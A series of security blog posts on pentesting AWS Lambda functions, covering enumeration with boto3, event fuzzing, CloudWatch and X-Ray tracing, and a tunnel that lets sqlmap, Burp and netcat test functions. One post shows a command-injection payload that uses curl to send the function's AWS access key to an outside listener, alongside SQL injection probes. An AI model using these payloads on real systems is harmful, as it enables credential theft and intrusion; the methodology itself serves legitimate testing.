Leveraging tunnelLambda with pentesting tools for serverless function testing

One of the challenges of lambda function testing is incorporating and integrating traditionally effective tools like netcat, Burp proxy or sqlmap. These tools run over HTTP(S) pipes, while a lambda function's events can come from anywhere without an HTTP pipe. Hence, one can leverage a tool like tunnelLambda while performing pentesting. It is part of our scanLambda toolkit (here - http://blog.blueinfy.com/p/blog-page.html).

It is very simple, as shown below. It establishes a tunnel between your target lambda function and your chosen tool on a localhost port.



'tunnelLambda' helps establish a tunnel from your shell to a targeted lambda function. It sends HTTP traffic arriving on the selected port through the tunnel to the test function. Hence, we can now use standard HTTP tools like netcat, sqlmap, Burp or ZAP to test the lambda function.


Once it is set, the script will listen on the target port for both GET and POST requests as shown below: -
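A minimal sketch of such a tunnel is shown below. This is a hypothetical reconstruction (tunnelLambda's actual implementation may differ); the function name, port and HTML form are illustrative assumptions. It listens locally, serves a trivial page on GET, and forwards each raw POST body to the Lambda `invoke` API via boto3:

```python
# Hypothetical sketch of a tunnelLambda-style bridge: listen on a local port
# and forward each POST body to a target Lambda function as the event payload.
# TARGET_FUNCTION and PORT are illustrative assumptions.
from http.server import BaseHTTPRequestHandler, HTTPServer

TARGET_FUNCTION = "processInvoice"
PORT = 8888

def invoke_lambda(event_bytes, client=None):
    """Send the raw event payload to the target function; return its response."""
    if client is None:
        import boto3  # requires configured AWS credentials
        client = boto3.client("lambda")
    resp = client.invoke(FunctionName=TARGET_FUNCTION,
                         InvocationType="RequestResponse",
                         Payload=event_bytes)
    return resp["Payload"].read()

class TunnelHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # serve a minimal page for manual interaction (the real tool's
        # page is richer)
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()
        self.wfile.write(b"<form method=POST><textarea name=event></textarea>"
                         b"<input type=submit value=Send></form>")

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length)
        result = invoke_lambda(body)
        self.send_response(200)
        self.send_header("Content-type", "application/json")
        self.end_headers()
        self.wfile.write(result)

if __name__ == "__main__":
    HTTPServer(("localhost", PORT), TunnelHandler).serve_forever()
```

With this running, any HTTP tool pointed at localhost:8888 effectively talks to the lambda function.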



When you make a GET request it serves a simple HTML page which can be used to interact with the lambda function, as shown in the below figure. We can open the page in a browser, paste in the event stream and click the "Send" button. It shows the output once the function is invoked.



Also, we can now use tools like netcat, Burp, sqlmap or any other tool to make a POST request directly. Here is our HTTP request:

$ cat sqltest.txt
POST / HTTP/1.1
Host: localhost:8888
Content-Length: 15

{"name":"john"}


We can pipe it to netcat:

$ cat sqltest.txt | nc localhost 8888
HTTP/1.0 200 OK
Server: BaseHTTP/0.6 Python/3.6.4
Date: Fri, 07 Sep 2018 03:04:41 GMT
Content-type: application/json

{"id": "1239873"}


We can start running sqlmap as well.

$ python sqlmap.py -r ../sqltest.txt
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.2.9.6#dev}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 08:37:00

[08:37:00] [INFO] parsing HTTP request from '../sqltest.txt'
JSON data found in POST data. Do you want to process it? [Y/n/q] Y
[08:37:05] [INFO] testing connection to the target URL
[08:37:07] [INFO] testing if the target URL content is stable
[08:37:09] [INFO] target URL content is stable
[08:37:09] [INFO] testing if (custom) POST parameter 'JSON name' is dynamic




We need to configure the details in Burp Repeater as shown below:

 

Once it is set, we can make the call as shown below:

 

Next, we can simply send the request to Intruder and run attacks as shown below:



Hence, this allows us to quickly leverage all popular tools against lambda functions.

Article by Hemil Shah


lambdaScanner - Scan and Secure serverless lambda functions

'lambdaScanner' is a toolkit containing a combination of scripts for performing penetration testing of lambda functions. The scripts in the toolkit help in assessing lambda functions from a security standpoint, enabling the tester to discover vulnerabilities in deployment as well as code. It aids in checking for vulnerabilities like improper permissions, SQL injection and command execution, to name a few. This is not an automated scanner, but a toolkit that helps pen-testers perform the testing of functions, so it needs to be used wisely by crafting customized requests and payloads. Lambda functions are invoked through various AWS events encompassing S3, DynamoDB, SQS etc., so the scripts in the toolkit are very helpful in evaluating functions as well as directly testing them with various sets of payloads. All these scripts are written in Python using boto3 APIs. The toolkit also has a package called 'lambdaProtect' which can be integrated with an existing lambda function to guard both the incoming event stream and the outgoing response.

This toolkit is a work-in-progress prototype and will be enhanced over time with additional functionality.

Here is a diagram, which describes 'lambdaScanner': -

 

For more detail, please visit - http://blog.blueinfy.com/p/blog-page.html

Lambda Event Assessment and Pentesting – Invoke, Trace and Dissect (Part 3)

In the last two blog posts, we covered an approach of pentesting lambda functions, using DAST and SAST methodologies, by footprinting, enumerating, scanning and tracing lambda functions to discover and verify security vulnerabilities. In this blog post, we will leverage instrumentation/IAST (Interactive Application Security Testing) approach to analyse and test lambda functions. This approach involves analysing the application behaviour at run time and then using DAST for inducing attacks. Also, a combination of DAST, SAST and IAST can be used to get a comprehensive view of the application, even at run time, and then discover and confirm vulnerabilities.

Below is a figure outlining the architecture of an application using lambda functions with sensors added to the code before performing a pentest of the application/lambda functions: -

 

 

Leveraging AWS X-Ray SDK/APIs:

 

X-Ray is a service provided by AWS to analyse the integration of lambda functions and perform debugging across lambda functions and other points of interest through request tracing, exception collection and profiling capabilities. It is described as follows on AWS (https://aws.amazon.com/xray/): -

“AWS X-Ray helps developers analyze and debug production, distributed applications, such as those built using a microservices architecture. With X-Ray, you can understand how your application and its underlying services are performing to identify and troubleshoot the root cause of performance issues and errors. X-Ray provides an end-to-end view of requests as they travel through your application, and shows a map of your application’s underlying components. You can use X-Ray to analyze both applications in development and in production, from simple three-tier applications to complex microservices applications consisting of thousands of services.“

This helps in getting a map, but from a pentesting perspective we are more interested in putting hooks and sensors into the lambda code. We can do this using X-Ray SDK (https://docs.aws.amazon.com/xray/latest/devguide/xray-services-lambda.html).

X-Ray Sensors using Python:

 

Let’s try to do it using a python SDK. We can integrate X-Ray into our lambda code base as shown below: -



We can also patch all inherent components which are supported by X-Ray. As shown in the above figure, we create a recorder and use a decorator provided by the library by adding a line starting with "@" before the lambda function. Once this line is added, we can start inserting sensors for fetching runtime information. Let's add some annotation and metadata: -

 

In the above code, we define a sub-segment with an annotation and then use the defined annotation as our sensor. Hence, we can start recording the runtime values before or after the interesting API calls. In the above case, we record the "command" variable before it goes to its sub-process. All these interactions get recorded at runtime by the X-Ray service in the logs.
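The sensor pattern described above can be sketched roughly as follows. This is a hedged illustration, not the exact code from the figure: in a real deployment the recorder would be `aws_xray_sdk.core.xray_recorder` (pip install aws-xray-sdk, bundled with the function), but here the recorder is injectable so the pattern can be exercised without AWS; the subsegment, annotation and handler names are assumptions.

```python
# Hedged sketch of the X-Ray sensor pattern: record a runtime value as an
# annotation and the full event as metadata inside a sub-segment.
# The recorder parameter is injectable; in Lambda it would be
# aws_xray_sdk.core.xray_recorder.
def add_sensors(event, recorder):
    subsegment = recorder.begin_subsegment("sensor")
    command = event.get("name", "")
    # sensor: record the runtime value before it reaches the sub-process call
    subsegment.put_annotation("command", command)
    # record the full event as metadata for later analysis
    subsegment.put_metadata("event", event)
    recorder.end_subsegment()
    return command

# Inside the lambda function itself this would look like:
#   from aws_xray_sdk.core import xray_recorder
#   @xray_recorder.capture("handler")
#   def lambda_handler(event, context):
#       command = add_sensors(event, xray_recorder)
#       ...
```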

Now, after invoking the function, when we go and see the X-Ray logs (as shown in the below figure) we see the execution time for each function is logged and we see that the function is not calling any other AWS component like S3, DynamoDB, SQS etc.: -

 

In the below figure, we see the "lambda" sub-segment values in the logs according to the defined annotations and sub-segments: -


 We can also see full metadata with the event we pushed in the record as shown below: -

 

In this way, we can inject a payload and see our injected payload go through to initiate a successful command injection after the function is invoked (a detailed process of this was explained in the last blog post).

Instrumentation without AWS X-Ray:

 

Apart from AWS X-Ray, we can also use other available tools for debugging purpose. For example, let’s use the following package (https://github.com/mihneadb/python-execution-trace) to get a runtime variable dump along with the executed code.

The code provided in the package can be modified and added to the lambda function as shown below: -

 

We use its @record decorator, and it prints the log to CloudWatch using a simple "print" function.
We can see the following log in our CloudWatch console: -

 

We get a full dump of all the variables with line numbers. Also, we can see how values change at runtime during line-by-line execution. Hence, it can provide much more valuable information for the analysis needed to detect a vulnerability.

Apart from the third-party tools that are available, we can also define our own decorator function in Python to record events as well as output, which we can leverage for instrumentation as shown below: -

 

We define a function "instrument", which we can add before our actual lambda function in our python code as shown below: -
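A minimal sketch of such a decorator is shown below. The "instrument" name comes from the text; the handler body is a hypothetical example, and `print` is used because Lambda routes stdout to CloudWatch.

```python
# Minimal sketch of a home-grown instrumentation decorator: it logs the
# incoming event and the handler's output via print(), which Lambda sends
# to CloudWatch. The handler below is a hypothetical example.
import functools
import json

def instrument(func):
    @functools.wraps(func)
    def wrapper(event, context):
        print("[instrument] event:", json.dumps(event))
        result = func(event, context)
        print("[instrument] result:", json.dumps(result))
        return result
    return wrapper

@instrument
def lambda_handler(event, context):
    # hypothetical handler logic
    return {"status": "processed", "name": event.get("name")}
```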

 

At the point of execution, we can see these entries in our CloudWatch logs: -

 

In this way, we can add multiple "print" functions in between the code and use something like "locals()" to dump runtime variables as well.

360 Degree – DAST, SAST and IAST

 

We can implement the following strategy to get a 360 degree view of the lambda function.
  1. We can scan the code to identify some interesting API calls which can directly be mapped to vulnerabilities like command injection, SQL injections etc. and monitor those specific calls. (SAST)
  2. We can inject sensors by using AWS X-Ray, at interesting places, before or after the call and record the values going to the API. (IAST)
  3. We can then invoke the lambda function and fuzz the event stream with customized payloads. (DAST)
  4. All the events will be recorded in the logs as per the injected sensors and we will have the data to be analysed. By analysing this data, as well as the output of the invoked functions we will be able to detect and confirm a vulnerability. Moreover, this information would also aid in crafting exploits for the detected vulnerability.

Conclusion:

The most common use case scenario of lambda functions involves asynchronous functions, where there is no output coming back to the tester. This makes vulnerability confirmation difficult. Thus, IAST/instrumentation is a very interesting, and arguably imperative, approach to pentesting lambda functions. There are multiple tools and approaches that can be deployed for instrumentation. Moreover, a combination of all three approaches (DAST, SAST and IAST) would save a lot of effort and would help in detecting a vulnerability with much more precision. It would help avoid unnecessary guesswork and focus on identifying pointers, doing run-time analysis, crafting customized payloads with correct test cases and analysing the logs to detect loopholes in the application from a security standpoint.

Article by Amish Shah & Shreeraj Shah

Lambda Event Assessment and Pentesting – Invoke, Trace and Dissect (Part 2)

In the last blog post, we talked about the basic methodology for lambda testing, where we covered enumeration, profiling and invocation. We can do quick fuzzing of a lambda function by passing a set of payloads. Lambda functions can be used to build microservices, which get incorporated into web applications as part of the architecture. These functions can be called in both synchronous and asynchronous manners depending on the architectural requirement. In this blog post, we are going to cover another aspect of testing lambda functions, which mainly comprises leveraging CloudWatch logs while performing penetration testing.

Architecture of Application with Lambda:

 

Let’s take a real-life scenario as shown in the below figure. In this case, there is a web application (an enterprise financial application) that is used from various devices like mobiles or computers across the globe. APIs are also used to extend the application so that it can be leveraged by third parties like suppliers, vendors, customers etc. As shown in the application architecture, various AWS components are used by the web application.


Figure 1 – Invoice Processing System for a Financial Application

Let’s take a simple use case scenario:
  • The users of the application submit an invoice for processing through the web or API where they perform various activities like uploading a file, providing the file name, other basic information etc.
  • The web application in turn calls the lambda function which triggers the activities across the AWS components (Amazon S3 and DynamoDB)
  • Once everything is in place, based on scheduling, the message gets posted to Amazon SQS service for asynchronous processing
  • At some point in time, SQS triggers the second lambda function via the queue to process the invoice. The queue provides the invoice file to the lambda function, which processes the invoice and gets the task done.
If we look at the threat model for the above components, one of the important areas to check is the asynchronous lambda function, which is processing the SQS message.

Let’s do the testing of that function and see what kind of issues we can discover.

Function Integration with other Services:

We can go ahead and enumerate the function details as mentioned in the last blog post. We get the following response and profile for the function. We get basic information like technology stack, permissions, role, code and mapping.



We can see this function is integrated with the SQS service. Here is its mapping: -

---Function Mapping---
[{'UUID': '5cc9f6a9-2b39-41df-9d09-e7adbf3d9305', 'BatchSize': 10, 'EventSourceArn': 'arn:aws:sqs:us-east-2:313588302550:processInvoice', 'FunctionArn': 'arn:aws:lambda:us-east-2:313588302550:function:processInvoice', 'LastModified': datetime.datetime(2018, 8, 10, 15, 32, 32, 867000, tzinfo=tzlocal()), 'State': 'Disabled', 'StateTransitionReason': 'USER_INITIATED'}]


Hence, we can start injecting messaging or SQS events to this function and see how it responds. Before that let’s take a quick look at the AWS console. Here is the SQS position on the AWS console at a given point in time.



We can look at the log of the lambda function for which the queue trigger is set.
 

We can clearly see the event being fired and the message received and processed by the function.

Testing the Function and Tracing:

We can now directly test the function by supplying various values, which are controlled by the user. Below is a sample of the event body. The “body” is controlled by the user, which makes it an interesting area to fuzz.

{
  "Records": [
    {
      "body": "invoice-98790",
      "receiptHandle": "MessageReceiptHandle",
      "md5OfBody": "7b270e59b47ff90a553787216d55d91d",
      "eventSourceARN": "arn:aws:sqs:us-east-2:123456789012:MyQueue",
      "eventSource": "aws:sqs",
      "awsRegion": "us-east-2",
      "messageId": "19dd0b57-b21e-4ac1-bd88-01bbb068cb78",
      "attributes": {
        "ApproximateFirstReceiveTimestamp": "1523232000001",
        "SenderId": "123456789012",
        "ApproximateReceiveCount": "1",
        "SentTimestamp": "1523232000000"
      },
      "messageAttributes": {}
    }
  ]
}


We can use the following code to invoke the function where the event is taken from the file.
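A hedged sketch of such an invoker is shown below. This is a hypothetical reconstruction of the script (the real code may differ); the function and file names are illustrative, and credentials are assumed to be configured.

```python
# Hedged sketch: load an event payload from a file and invoke the target
# Lambda function synchronously. Function and file names are illustrative.
import json

def invoke_from_file(function_name, event_file, client=None):
    if client is None:
        import boto3  # requires configured AWS credentials
        client = boto3.client("lambda")
    print("(+)Configuring Invoking ...")
    print("    (-) Loading event from file ...")
    with open(event_file) as f:
        payload = f.read()
    resp = client.invoke(FunctionName=function_name,
                         InvocationType="RequestResponse",
                         Payload=payload.encode())
    print("    (-) Request Id ==> " + resp["ResponseMetadata"]["RequestId"])
    body = resp["Payload"].read().decode()
    print("    (-) Response ==>")
    print("    (-) " + body)
    return body

# invoke_from_file("processInvoice", "event.json")
```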

 

We get the following output

(+)Configuring Invoking ...
    (-) Loading event from file ...
    (-) Request Id ==> 9dc6aa67-9f9b-11e8-924a-99f63ade1b6b
    (-) Response ==>
    (-) "Invoice processing done!"


We can use the Request Id to trace the log and see what went on behind the scenes. Let’s use the following code to enumerate the CloudWatch logs for the call.
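A sketch of such a log search might look like the following. This is a hypothetical reconstruction: the log group name follows AWS's `/aws/lambda/<function-name>` convention, and the search simply greps recent log streams for the Request Id.

```python
# Hedged sketch: search recent CloudWatch log streams of a Lambda function
# for entries containing a given Request Id. Names are illustrative.

def log_group_for(function_name):
    # Lambda writes to /aws/lambda/<function-name> by convention
    return "/aws/lambda/" + function_name

def trace_request(function_name, request_id, client=None):
    if client is None:
        import boto3  # requires configured AWS credentials
        client = boto3.client("logs")
    group = log_group_for(function_name)
    streams = client.describe_log_streams(logGroupName=group,
                                          orderBy="LastEventTime",
                                          descending=True, limit=5)
    hits = []
    for stream in streams["logStreams"]:
        events = client.get_log_events(logGroupName=group,
                                       logStreamName=stream["logStreamName"])
        hits += [e["message"] for e in events["events"]
                 if request_id in e["message"]]
    return hits

# trace_request("processInvoice", "9dc6aa67-9f9b-11e8-924a-99f63ade1b6b")
```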



We can pass in the function name and see the results. We can see the last entries and compare them with the Request Id. Here is the entry for that Request Id: -

 

We can fuzz the stream, try different things here and analyse the responses. For example, we pass the following message: -

{
  "Records": [
    {
      "body": "junkname",
      "receiptHandle": "MessageReceiptHandle",
      "md5OfBody": "7b270e59b47ff90a553787216d55d91d",
      "eventSourceARN": "arn:aws:sqs:us-east-2:123456789012:MyQueue",
      "eventSource": "aws:sqs",
      "awsRegion": "us-east-2",
      "messageId": "19dd0b57-b21e-4ac1-bd88-01bbb068cb78",
      "attributes": {
        "ApproximateFirstReceiveTimestamp": "1523232000001",
        "SenderId": "123456789012",
        "ApproximateReceiveCount": "1",
        "SentTimestamp": "1523232000000"
      },
      "messageAttributes": {}
    }
  ]
}


We invoke the function and see a different response.

(+)Configuring Invoking ...
    (-) Loading event from file ...
    (-) Request Id ==> f9e61f20-9f9d-11e8-99aa-59c2b3fe1ba2
    (-) Response ==>
    (-) "Invoice processing done!"

We can see entries in the log.

 

It looks like it is trying to open the file. Now we can try different variations to figure out the vulnerability. In the previous legitimate request, we saw a line where it returned the file's content type; hence, it may be using some underlying OS command to fetch the file content type. We can attempt command injection here and see what response we get. Since we are not getting a synchronous response with a message back, we can try injecting the following command: -

Invoice-98790;url='https://API-ID.execute-api.us-east-2.amazonaws.com/listen?dump='$AWS_ACCESS_KEY_ID;curl $url


Here, we are passing a URL and trying to extract the AWS access key. Once it is extracted, we use cURL to send it to a different location. Since that URL is controlled by us, we can check its logs for the response. If the command gets executed successfully, then we know the function is indeed vulnerable.

Here is the message event we try to inject.

 

We have a mock listener at the target URL. It will collect the information if the command gets executed successfully. Let’s invoke the function and monitor the API logs: -

 

Hence, this is how the vulnerability is detected. We can also review the code and find the following line using a standard SAST approach: -

 

Conclusion:

Lambda function testing is relatively simple when we focus on fuzzing the event and injecting the payload directly through AWS APIs. It is imperative to identify threat points and fuzz with the right payloads at the right place. Some of these events are not synchronous and are triggered in various different ways, so it is not always possible to simulate them exactly like an actual event fired from different sources, but direct simulation, as in the above case, is easy. Also, there are different data collection points for an AWS function; we have covered DAST and SAST in this case. We can leverage IAST/instrumentation via X-Ray or other methods provided by specific languages, which will be covered in the coming blog post.
Article by Amish Shah & Shreeraj Shah

Lambda Event Assessment and Pentesting – Invoke, Trace and Dissect (Part 1)

Lambda functions are at the core of serverless applications. These functions are invoked through various events from various sources like browsers, mobile devices or API calls. The events through which lambda functions are invoked have a pre-defined format for event payloads. The payloads sent via events are eventually consumed by the user-defined code (functions). An attacker with malicious intent can exploit vulnerable code by poisoning the event payload.

Lambda Function Event Model:


A lambda function can consume one or multiple events over various streams. It has its own event model with a defined structure, as shown in the figure below: -

 Figure – Lambda invocation and access points

As shown in the figure, the end client interacts with the lambda function through event payloads using channels like HTTP(S), APIs or other means. It is possible to have asynchronous invocation or polling of events. Hence, there are various possible ways to invoke a function; it all depends on how these functions are written and what entry points they expose. In the above figure, the lambda function can be consuming events like SNS, SQS, S3, Kinesis, Lex, Alexa, CloudFront, API Gateway etc. There is a long list of these events, and each has a pre-defined payload; for example, here is an event payload for Amazon SQS.

{
  "queueUrl": "https://sqs.us-east-2.amazonaws.com/123456789012/MyQueue",
  "messages": [
    {
      "body": "Hello ….. message",
      "receiptHandle": "MessageReceiptHandle",
      "md5OfBody": "7b270e59b47ff90a553787216d55d91d",
      "messageId": "19dd0b57-b21e-4ac1-bd88-01bbb068cb78",
      "attributes": {
        "ApproximateFirstReceiveTimestamp": "1523232000001",
        "SenderId": "123456789012",
        "ApproximateReceiveCount": "1",
        "SentTimestamp": "1523232000000"
      },
      "messageAttributes": {}
    }
  ]
}


Hence, we can use these templates for our testing and pass on to the functions at the point of invocation.

Quick Recap on Function Enumeration and Profiling:


In the previous posts we have seen techniques to do function enumeration and profiling. For example: - a simple code like below would list down critical information about the “login” function.



The output for “login” function call is as below: -

 

Methodology for assessing Lambda Functions:


We can start assessing the function with the following techniques in a comprehensive way: -

1.    DAST – we can invoke functions, send across various event payloads and analyse the responses and behaviour, which helps in identifying various known vulnerabilities.
2.    SAST – we can fetch the code from the Code-Location and try to identify vulnerabilities from the source code itself. This can be a heavy task, depending on the nature and size of the code.
3.    IAST & Logging – we can analyse various logs from Amazon, including X-Ray (Amazon's instrumentation SDK). Also, one can use this SDK for runtime analysis and to collect micro logs.
4.    Deployment Testing – we can analyse the deployment of the function using all three above-listed testing methodologies; one of the important aspects is to look into the permissions given to users/functions.



  
Hence, we can go ahead and do a full 360-degree assessment of the function by utilizing all these techniques to discover possible vulnerabilities.

Let’s look at the possible functions deployed as part of the application: -



As shown in the figure, the function is using SQS, S3 and DynamoDB as part of the application. Functions can be invoked over the API gateway using HTTP calls. All logs go to CloudWatch, both from the function as well as the APIs. Also, assuming that X-Ray is enabled on the function, additional logs can be fetched from AWS as well.

Looking at the above structure, we can perform DAST from two points – through the API gateway and through the AWS SDK with limited access to functions. We can directly invoke and fuzz the stream. We can do SAST by fetching the code via SDK calls and reviewing the entire code base of the function. Fetching all logs, including X-Ray, can be leveraged as part of the IAST methodology.

Assessing Function using DAST:


We can start fuzzing and scanning lambda functions by simply invoking the function with a list of payloads. Here is a simple script which can take various payloads and run them against the function. You can add more values to the "payload" list and fuzz the events. Here we have simply filled the event with key-value pairs; you can add any messaging events by using the properly defined structure.
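A hedged sketch of such a fuzzing loop is shown below. The payload list and the event's key-value shape are illustrative assumptions, not the exact script from the figure.

```python
# Hedged sketch of the fuzzing loop: invoke the target function once per
# payload and collect the responses. Payloads and the event's key-value
# shape are illustrative assumptions.
import json

payloads = ["john", "john' OR '1'='1", "invoice-98790;id", "../../../etc/passwd"]

def fuzz(function_name, payloads, client=None):
    if client is None:
        import boto3  # requires configured AWS credentials
        client = boto3.client("lambda")
    results = []
    for p in payloads:
        event = json.dumps({"name": p})
        resp = client.invoke(FunctionName=function_name,
                             InvocationType="RequestResponse",
                             Payload=event.encode())
        # note the RequestId for later log tracing
        results.append((p, resp["ResponseMetadata"]["RequestId"],
                        resp["Payload"].read().decode()))
    return results

# fuzz("login", payloads)
```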


 

We get the following responses back and can see the entire object with the messages coming out. Note the "RequestId" here; using it, various logs can be searched and the request can be traced. We will cover tracing in the next blog post.

 



Moreover, there might be a leak of information sensitive to the application, which can be discovered by analysing the messages displayed in the response. Using this information (say, for example, a SQL error seen in the response), one can craft various payloads and exploit the issue if an actual vulnerability exists.

As shown in the enumeration section above, we can get a profile of the lambda functions. From the profile, we can see that the function is mapped to Amazon API Gateway. This information can be leveraged: using the API ID, the function can be called directly over HTTP. This request would pass through the HTTP channel, which would bring various mechanisms like a WAF into the picture as well. Below is a simple way to invoke the function from the browser directly: -

 
We can again analyse responses as well as note the "RequestId", which can further be used to search and trace the request across logs to see different touch points.



Conclusion:


It is quite obvious that one can leverage the AWS API directly for testing lambda functions. A set of test cases and pen-test users (with varying access) can be created to conduct thorough testing from a security standpoint. Tests can be run against a list of all functions to check for various attacks, ranging from injections to logical bypasses. However, it is imperative to involve manual intelligence to analyse the behaviour of the functions more closely to identify the correct touch points and security vulnerabilities. Automated techniques can be applied on top of it by leveraging the SDK from AWS. Thus, comprehensive DAST analysis of lambda functions is easy and doable through penetration testing of these functions. We will look into tracing in the next blog post.

Article by Amish Shah & Shreeraj Shah

Enumerating Lambda functions for Pentesting

Lambda functions can be directly pentested, as discussed in the last post. We would like to take it to the next level by illustrating a methodology to automate pentesting. It is interesting to leverage scripting to automate the review of lambda functions from a security standpoint. We can use the SDKs and libraries available in various languages. In this post, we are using Python with boto3. More detail and documentation can be found at https://boto3.readthedocs.io/en/latest/reference/services/lambda.html.

Let’s use a simple sample and run it against our target deployment. Before running these scripts, one needs to set up the AWS configuration as discussed in the last post. We can run a script that uses “list_functions” to fetch all functions deployed on the target environment. Here is the list of functions fetched from the deployment.

tools $python3 listfunction.py
(+) Lambda functions ...
   (-)pyhello
   (-)login
   (-)hello
   (-)myService-dev-helloworld
   (-)delete
   (-)getuserinfo
   


Here is the code snippet for the function used.

import json
import boto3

client = boto3.client("lambda")

def getFunctions():
    # list_functions returns metadata for every function in the account/region
    raw_functions = client.list_functions()
    all_functions = raw_functions["Functions"]
    #print(json.dumps(all_functions,indent=1))
    list_of_functions = []
    for i in all_functions:
        list_of_functions.append(i["FunctionName"])
    return list_of_functions


This can be the entry point for pentesting. You can uncomment the line where we use json.dumps; it will give you the entire stream for evaluation. Now we can take each function and start enumerating it as shown below. We can start evaluating important parameters and their impact on security.

tools $python3 getFunctionInfo.py login
(+) Fetching Lambda function login...
       (+) Platform: nodejs6.10
       (+) Permission: arn:aws:iam::313588302550:role/service-role/access
       (+) Code-Location: https://awslambda-us-east-2-tasks.s3.us-east-2.amazonaws.com/snapshots/313588302550/login-a1488a4f-………69c59232e73703


In the above case, we can fetch important information like the platform, the permissions and the code location (from which to fetch the source). We can use “get_function” to fetch details about a function. Here is the code snippet -

import sys
import json
import boto3

client = boto3.client("lambda")

target_function = sys.argv[1]
print("(+) Fetching Lambda function "+target_function+"...")
myfunc = client.get_function(FunctionName=target_function)
#print(json.dumps(myfunc,indent=1))
temp = myfunc["Configuration"]
print ("       (+) Platform: "+temp["Runtime"])
print ("       (+) Permission: "+temp["Role"])
temp_code = myfunc["Code"]
print ("       (+) Code-Location: "+temp_code["Location"]+"\n")


If you are interested in seeing the entire object, just use json.dumps() and print the object, as in the commented line in both of the above cases.

We can enumerate other mapping information as well; here is how we can leverage “list_event_source_mappings”.

tools $python3 listmap.py
[{'UUID': '682c8cb8-cb32-4cdc-b059-8f655f71fe07', 'BatchSize': 100, 'EventSourceArn': 'arn:aws:dynamodb:us-east-1:223983707454:table/targetlocations/stream/2018-05-30T09:41:22.995', 'FunctionArn': 'arn:aws:lambda:us-east-1:223983707454:function: targetlocations', 'LastModified': datetime.datetime(2018, 7, 4, 8, 10, tzinfo=tzlocal()), 'LastProcessingResult': 'OK', 'State': 'Enabled', 'StateTransitionReason': 'User action'}]

Here is the code for the same.

import boto3

client = boto3.client("lambda")

myfunc = client.list_event_source_mappings(FunctionName='targetlocations')
temp = myfunc["EventSourceMappings"]
print(temp)

From the EventSourceArn, it seems the function is using DynamoDB.

In the next posts, we will go over invoking and tracing the functions.

Article by Amish Shah & Shreeraj Shah

Fuzzing Serverless Lambda functions directly

Serverless application (FaaS - Function as a Service) development and the microservices model are emerging in next-generation applications and architectures. They are becoming easier to maintain and more cost effective in the DevOps era. It is imperative to do quick testing of these functions from a security standpoint and look for common vulnerabilities like injections. Amazon provides Lambda functions for serverless architecture, and Google and Azure have implemented similar support with FaaS offerings in their own portfolios. As shown in the below figure, a lambda function is created and deployed on Amazon and can be triggered by a set of events like an HTTP gateway, an S3 bucket and a number of other events. In the end, the functions are “invoked” and executed by the end client (browser, mobile or API users). The challenge from a security standpoint is to fuzz the inputs going to these functions and identify any defects in the code via errors or behavioural observations (a purely DAST approach).


Figure 1 - Lambda invoke and integration

To address the issue of fuzzing, we can leverage the AWS client (command line) directly and interact with functions without going through the actual events shown in the above diagram. It is possible to test these functions if the developer provides the right environment along with credentials to the pentester. We can set up the AWS client and run some quick tests to discover vulnerabilities and weaknesses.

One needs to set up the AWS client; guidelines can be found here - https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html

First, one needs to set up access to the environment using the keys given by the developers, as shown below. It is a quick process and needs only basic details.

$ aws configure
AWS Access Key ID [None]: …
AWS Secret Access Key [None]: …
Default region name [None]: …
Default output format [None]: …


Once it is set, we can go ahead and enumerate the functions deployed on the server using the “list-functions” option, as shown below. It helps in enumerating all deployed functions with some basic information, including permissions.
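The CLI calls described in this section might look roughly like the following. The function name and payload are illustrative assumptions; note that with AWS CLI v2, `--payload` additionally needs `--cli-binary-format raw-in-base64-out` for raw JSON.

```shell
# Enumerate deployed functions with basic metadata (runtime, role, etc.)
aws lambda list-functions

# Fetch configuration and code location for one function; the "Location"
# field in the output is a pre-signed URL to the code bundle
aws lambda get-function --function-name login

# Invoke the function directly with a crafted payload and capture the result
aws lambda invoke --function-name login \
    --payload '{"username":"john","password":"test"}' out.json
cat out.json
```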



As shown above, we get a list of all the functions. Next, we can enumerate the functions in more detail, for example getting the configuration and the actual location of the code, as shown below.



One can get the location of the code with the following call; the “Location” attribute gives the code for review if required.



Now, we can get into the most critical part of the testing. We can invoke the function and start interacting with it over the AWS APIs, as shown below, without an actual event. The event could come from any source, but we are keeping the focus on directly testing the function.



In the above case, we invoked the “login” function with a “payload”. We directed the output to a file and can see the results.

Now, we can go ahead and start manipulating the “payload” with different values from a DAST/blackbox standpoint. We can fuzz the payload and start injecting values to discover vulnerabilities within lambda functions.

In a nutshell, it is easy to fuzz lambda functions and test them thoroughly. It is possible to add these tests into a DevOps pipeline. The AWS client can be used with different languages as well to automate the process. For example, the following Python code with the boto3 client helps automate fuzzing.
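A hedged sketch of such a boto3 invoker is shown below; the event's key names and the function name are assumptions based on the examples in this post, not the exact code from the figure.

```python
# Hedged sketch: invoke the "login" function with an attacker-controlled
# payload value via boto3. The event's key names are illustrative.
import json

def invoke_with_payload(function_name, value, client=None):
    if client is None:
        import boto3  # requires configured AWS credentials
        client = boto3.client("lambda")
    event = json.dumps({"username": value, "password": "test"})
    resp = client.invoke(FunctionName=function_name,
                         InvocationType="RequestResponse",
                         Payload=event.encode())
    return resp["Payload"].read().decode()

# invoke_with_payload("login", "john OR 1=1")
```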

 

Here, we are passing ‘john OR 1=1’ as the payload to invoke the function. We get the following response.

 

We get “Error in fetching value from table” as the status message, which implies it may have something to do with SQL injection. Again, we need to dive deeper and find the exact payload. We can automate the script and start fuzzing the lambda functions.

Article by Amish Shah & Shreeraj Shah